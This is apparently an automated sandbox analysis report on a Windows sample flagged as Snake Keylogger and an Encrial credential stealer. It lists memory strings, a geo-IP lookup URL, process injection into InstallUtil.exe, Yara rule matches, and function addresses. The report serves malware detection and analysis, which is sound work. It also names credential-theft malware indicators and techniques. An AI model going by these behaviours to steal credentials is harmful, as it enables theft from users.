                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: Activator.exe.0.drString found in binary or memory: https://tools.ietf.org/html/rfc4253#section-4.2
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060D76C0 NtResumeThread,10_2_060D76C0
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060D3890 NtProtectVirtualMemory,10_2_060D3890
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060D76BA NtResumeThread,10_2_060D76BA
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060D3888 NtProtectVirtualMemory,10_2_060D3888
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0103184A0_2_0103184A
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_010333D40_2_010333D4
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_010312C80_2_010312C8
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_010312D00_2_010312D0
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_04E6DCD00_2_04E6DCD0
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_04E65FC90_2_04E65FC9
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_04E6793B0_2_04E6793B
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_04E63A200_2_04E63A20
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_04E6BED00_2_04E6BED0
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_04E601B80_2_04E601B8
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_04E6F1380_2_04E6F138
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_04E63A110_2_04E63A11
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05274B280_2_05274B28
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_052712580_2_05271258
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05278F280_2_05278F28
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_052750680_2_05275068
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05274B180_2_05274B18
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_052712480_2_05271248
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_053281600_2_05328160
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05321E100_2_05321E10
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0532BB880_2_0532BB88
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_053284870_2_05328487
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_053297680_2_05329768
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_053241290_2_05324129
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05321DF20_2_05321DF2
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05324DC80_2_05324DC8
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0533690F0_2_0533690F
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0533E1800_2_0533E180
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_053300060_2_05330006
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05332C760_2_05332C76
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_053300400_2_05330040
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0533DF300_2_0533DF30
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0533EB400_2_0533EB40
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05334B810_2_05334B81
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_053362580_2_05336258
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_053362480_2_05336248
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0557E3400_2_0557E340
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_055784380_2_05578438
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_055772000_2_05577200
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_055BD8180_2_055BD818
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_055B16980_2_055B1698
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_055B16A80_2_055B16A8
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0562FB500_2_0562FB50
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_056100400_2_05610040
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_056100060_2_05610006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A8C5482_2_04A8C548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A82DE02_2_04A82DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A894902_2_04A89490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A8C5432_2_04A8C543
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A827B92_2_04A827B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A8947F2_2_04A8947F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06265DEC2_2_06265DEC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06265E412_2_06265E41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0626B6502_2_0626B650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06266C712_2_06266C71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06265DE02_2_06265DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06264A602_2_06264A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_062631E02_2_062631E0
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_018C184B10_2_018C184B
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_018C33D410_2_018C33D4
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_018C12D010_2_018C12D0
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05A5DCD010_2_05A5DCD0
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05A55FA710_2_05A55FA7
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05A5793B10_2_05A5793B
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05A53A2010_2_05A53A20
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05A5BEC010_2_05A5BEC0
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05A5BED010_2_05A5BED0
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05A501B810_2_05A501B8
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05A5F13810_2_05A5F138
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05AA4B2810_2_05AA4B28
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05AA125810_2_05AA1258
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05AA8F2810_2_05AA8F28
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05AA4B1810_2_05AA4B18
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E4816010_2_05E48160
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E41E1010_2_05E41E10
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E4BB8810_2_05E4BB88
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E4848710_2_05E48487
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E4976810_2_05E49768
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E4412910_2_05E44129
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E41DF210_2_05E41DF2
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E44DC810_2_05E44DC8
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E7E18010_2_05E7E180
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E7690F10_2_05E7690F
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E7004010_2_05E70040
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E7000610_2_05E70006
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E7EB4010_2_05E7EB40
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E7DF3010_2_05E7DF30
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E7624810_2_05E76248
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E7625810_2_05E76258
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05F5E34010_2_05F5E340
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05F5843810_2_05F58438
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060D008810_2_060D0088
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060D007810_2_060D0078
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060D29A810_2_060D29A8
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060FBFA010_2_060FBFA0
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060F169810_2_060F1698
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060F16A810_2_060F16A8
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060FBF9110_2_060FBF91
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_0616FB5010_2_0616FB50
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_0615000610_2_06150006
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_0615004010_2_06150040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_030227B911_2_030227B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_0302C53011_2_0302C530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_0302948011_2_03029480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_0302C52111_2_0302C521
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_03022DD111_2_03022DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_0302946F11_2_0302946F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0613811_2_05C06138
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0BC6011_2_05C0BC60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0AF0011_2_05C0AF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C089E011_2_05C089E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0858811_2_05C08588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0857911_2_05C08579
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0450F11_2_05C0450F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0452011_2_05C04520
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0F44811_2_05C0F448
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0F45811_2_05C0F458
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0741811_2_05C07418
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0742811_2_05C07428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0E74011_2_05C0E740
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0E75011_2_05C0E750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0568011_2_05C05680
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0566F11_2_05C0566F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0E18011_2_05C0E180
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0812011_2_05C08120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0813011_2_05C08130
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0F00011_2_05C0F000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0602A11_2_05C0602A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C013A811_2_05C013A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0032011_2_05C00320
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0033011_2_05C00330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0521A11_2_05C0521A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0522811_2_05C05228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C04DC011_2_05C04DC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C04DD011_2_05C04DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C07CC811_2_05C07CC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C00CD811_2_05C00CD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C07CD811_2_05C07CD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C06FC311_2_05C06FC3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C06FD011_2_05C06FD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0EFF011_2_05C0EFF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C089D011_2_05C089D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0496911_2_05C04969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0497811_2_05C04978
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0788011_2_05C07880
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0F8A011_2_05C0F8A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0F8B011_2_05C0F8B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0787111_2_05C07871
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0EB9811_2_05C0EB98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C0EBA811_2_05C0EBA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C05ACA11_2_05C05ACA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C05AD811_2_05C05AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05C00AB811_2_05C00AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_06E16C5111_2_06E16C51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_06E15DEC11_2_06E15DEC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_06E15E4111_2_06E15E41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_06E1B65011_2_06E1B650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_06E15DE011_2_06E15DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_06E14A6011_2_06E14A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_06E131E011_2_06E131E0
                    Source: TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1245368848.0000000004F30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameThqvisca.dll" vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePO#50241.exe2 vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000000.1221849527.000000000065E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePO#50241.exe2 vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1233434010.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exeBinary or memory string: OriginalFilenamePO#50241.exe2 vs TtLlwb3ava.exe
                    Source: TtLlwb3ava.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
